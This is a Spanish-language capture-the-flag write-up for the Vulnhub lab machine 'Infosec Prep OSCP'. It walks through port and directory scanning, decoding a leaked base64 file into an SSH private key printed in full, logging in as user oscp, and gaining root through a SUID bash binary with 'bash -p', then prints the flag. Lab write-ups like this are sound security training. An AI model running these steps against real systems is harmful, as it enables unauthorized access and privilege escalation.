[VULNHUB] INFOSEC PREP OSCP

Hoy vamos a hackear la maquina de Vulnhub llamada Infosec Prep OSCP.Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/infosec-prep-oscp,508/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 20:13 CEST Nmap scan report for oscp.home (192.168.1.24) Host is up (0.00024s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.4.2 | http-robots.txt: 1 disallowed entry |_/secret.txt |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: OSCP Voucher – Just another WordPress site 33060/tcp open mysqlx? | fingerprint-strings: | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: | Invalid message" |_ HY000 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port33060-TCP:V=7.80%I=7%D=7/16%Time=5F1098DD%P=x86_64-pc-linux-gnu%r(N SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\ SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2 SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0") SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01 SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\" SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9 SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\ SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0 SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString, SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0 SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\ SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9," SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1 SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000 SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0 SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0 SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\ SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.01 seconds
    Miramos mas en profundidad el puerto 80.
    ~ > gobuster dir -u http://192.168.1.24 -w /usr/share/wordlists/dirb/big.txt -x txt,php =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.24 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php [+] Timeout: 10s =============================================================== 2020/07/16 20:16:04 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.php (Status: 403) /.htpasswd (Status: 403) /.htpasswd.txt (Status: 403) /.htpasswd.php (Status: 403) /index.php (Status: 301) /javascript (Status: 301) /license.txt (Status: 200) /robots.txt (Status: 200) /robots.txt (Status: 200) /secret.txt (Status: 200) /server-status (Status: 403) /wp-admin (Status: 301) /wp-content (Status: 301) /wp-includes (Status: 301) /wp-config.php (Status: 200) /wp-login.php (Status: 200) /wp-trackback.php (Status: 200) =============================================================== 2020/07/16 20:16:13 Finished ===============================================================
    Vemos que hay un archivo llamado secret.txt. http://192.168.1.24/secret.txt Al acceder, parece que es base64. Usamos curl para obtener el texto, y de paso le hacemos el decode de base64.
    ~ > curl -v "http://192.168.1.24/secret.txt" | base64 -d * Trying 192.168.1.24:80... * TCP_NODELAY set % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Connected to 192.168.1.24 (192.168.1.24) port 80 (#0) > GET /secret.txt HTTP/1.1 > Host: 192.168.1.24 > User-Agent: curl/7.68.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Sat, 08 Aug 2020 09:29:28 GMT < Server: Apache/2.4.41 (Ubuntu) < Last-Modified: Thu, 09 Jul 2020 06:48:34 GMT < ETag: "dae-5a9fc9d02e4f6" < Accept-Ranges: bytes < Content-Length: 3502 < Vary: Accept-Encoding < Content-Type: text/plain < { [3502 bytes data] 100 3502 100 3502 0 0 427k 0 --:--:-- --:--:-- --:--:-- 488k * Connection #0 to host 192.168.1.24 left intact -----BEGIN OPENSSH PRIVATE KEY----- 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 8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A= -----END OPENSSH PRIVATE KEY-----
    Al hacer el decode vemos que es una key privada SSH. La copiamos a nuestro sistema, y le damos los permisos adecuados.
    ~ > chmod 600 id_rsa
  • Low Shell
  • Usaremos el usuario oscp para loguearnos usando la key que nos hemos encotrado. El usuario oscp lo hemos obtenido "probando" usuarios.
    ~ > ssh oscp@192.168.1.24 -i id_rsa The authenticity of host '192.168.1.24 (192.168.1.24)' can't be established. ECDSA key fingerprint is SHA256:j6pDoPWkkeKgplTqHPtxSxrMqrQRMPl5AIW2Lfn14y8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.24' (ECDSA) to the list of known hosts. Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu 16 Jul 2020 06:35:44 PM UTC System load: 0.42 Usage of /: 26.3% of 19.56GB Memory usage: 58% Swap usage: 0% Processes: 205 Users logged in: 0 IPv4 address for eth0: 192.168.1.24 IPv6 address for eth0: 2a01:c50e:21e3:0:a00:27ff:fe1c:7753 0 updates can be installed immediately. 0 of these updates are security updates. The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Sat Jul 11 16:50:11 2020 from 192.168.128.1 -bash-5.0$
    Ya estamos dentro! Miramos los ficheros con SUID para ver si hay alguno interesante.
  • Privilege Escalation
  • -bash-5.0$ find / -perm -4000 2>/dev/null /snap/snapd/8542/usr/lib/snapd/snap-confine /snap/snapd/8140/usr/lib/snapd/snap-confine /snap/core18/1885/bin/mount /snap/core18/1885/bin/ping /snap/core18/1885/bin/su /snap/core18/1885/bin/umount /snap/core18/1885/usr/bin/chfn /snap/core18/1885/usr/bin/chsh /snap/core18/1885/usr/bin/gpasswd /snap/core18/1885/usr/bin/newgrp /snap/core18/1885/usr/bin/passwd /snap/core18/1885/usr/bin/sudo /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/1885/usr/lib/openssh/ssh-keysign /snap/core18/1754/bin/mount /snap/core18/1754/bin/ping /snap/core18/1754/bin/su /snap/core18/1754/bin/umount /snap/core18/1754/usr/bin/chfn /snap/core18/1754/usr/bin/chsh /snap/core18/1754/usr/bin/gpasswd /snap/core18/1754/usr/bin/newgrp /snap/core18/1754/usr/bin/passwd /snap/core18/1754/usr/bin/sudo /snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/1754/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/bin/gpasswd /usr/bin/mount /usr/bin/fusermount /usr/bin/passwd /usr/bin/newgrp /usr/bin/at /usr/bin/sudo /usr/bin/chfn /usr/bin/bash /usr/bin/pkexec /usr/bin/umount /usr/bin/chsh /usr/bin/su
    Vemos que esta /usr/bin/bash.... Lo usaremos para obtener root :)
    -bash-5.0$ /usr/bin/bash -p bash-5.0# id uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
  • flag.txt
  • bash-5.0# cd /root bash-5.0# ls fix-wordpress flag.txt snap bash-5.0# cat flag.txt d73b04b0e696b0945283defa3eee4538
  • End
  • Y con esto ya seriamos root de la maquina.